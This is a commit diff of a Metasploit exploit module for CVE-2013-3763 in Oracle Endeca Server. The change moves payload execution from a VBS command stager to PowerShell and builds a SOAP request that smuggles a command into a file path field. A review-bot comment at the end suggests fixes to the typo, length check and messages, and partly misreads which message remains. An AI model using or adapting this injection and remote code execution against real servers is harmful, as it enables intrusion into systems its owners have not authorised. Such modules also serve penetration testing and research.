Switch to powershell to exec payload
parent
965e2d88fe
commit
ad214da3de
|
@ -11,7 +11,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStagerVBS
|
||||
include Msf::Exploit::Powershell
|
||||
|
||||
def initialize
|
||||
super(
|
||||
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'juan vazquez' # Metasploit module
|
||||
],
|
||||
'Platform' => 'win',
|
||||
'Arch' => ARCH_X86, # Using ARCH_X86 because it's compatible with CmdStagerVBS
|
||||
'Arch' => [ ARCH_X86_64, ARCH_X86 ],
|
||||
'References' =>
|
||||
[
|
||||
[ 'CVE', '2013-3763' ],
|
||||
|
@ -40,7 +40,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2', { } ]
|
||||
[ 'Oracle Endeca Server 7.4.0 / Microsoft Windows 2008 R2 64 bits', { } ]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'Privileged' => false,
|
||||
|
@ -131,21 +131,24 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Exploiting by deploying a VBS CMD Stager...")
|
||||
# Windows 2008 Command Prompt Max Length is 8191
|
||||
execute_cmdstager({ :delay => 0.35, :linemax => 7500 })
|
||||
command = cmd_psh_payload(payload.encoded)
|
||||
if command.length > 8000
|
||||
# Windows 2008 Command Prompt Max Length is 8191
|
||||
fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
|
||||
end
|
||||
print_status("#{peer} - Exploiting through Powershell...")
|
||||
execute_command(command)
|
||||
end
|
||||
|
||||
def execute_command(cmd, opts)
|
||||
# To delete spaces priors to crlf lines since it is an observed behavior on Win 2008
|
||||
cmd.gsub!(/data = Replace\(data, vbCrLf, ""\)/, "data = Replace(data, \" \" + vbCrLf, \"\") : data = Replace(data, vbCrLf, \"\")")
|
||||
def execute_command(cmd)
|
||||
# HTML encode ampersands so SOAP is correctly interpreted
|
||||
cmd.gsub!(/&/, "&")
|
||||
injection = "c:\\"& #{cmd} &""
|
||||
exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
|
||||
begin
|
||||
res = send_request_soap(exploit_data)
|
||||
if res.nil? or res.code != 500 or res.body !~ /Error creating data files at/
|
||||
if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
|
||||
print_status("#{res.code}\n#{res.body}") if res
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
|
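Review bot: The fail_with message at the length check in exploit misspells the payload name ("paylod"); it should read `fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command")`. The 8000 threshold is measured on `command` alone, while what actually reaches the command interpreter is the `injection` string built in execute_command (`c:\"& … &"`) plus whatever the SOAP wrapper adds, so the gap between 8000 and the 8191 limit named in the comment is presumably what absorbs that — worth saying so in the comment rather than leaving the reader to infer it, e.g. `# 8191 is the Win2008 cmd limit; the remainder is reserved for the injection wrapper`. The status and failure messages still refer to the CMD Stager ("Exploiting by deploying a VBS CMD Stager..." and "Unable to execute the CMD Stager") although the new path runs the payload through PowerShell, so they should be updated too if the first one survives on the new side. The `or`/`and` chain in the response check on the new side would read more safely as `||`/`&&`, which is also the precedence a reader expects.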
|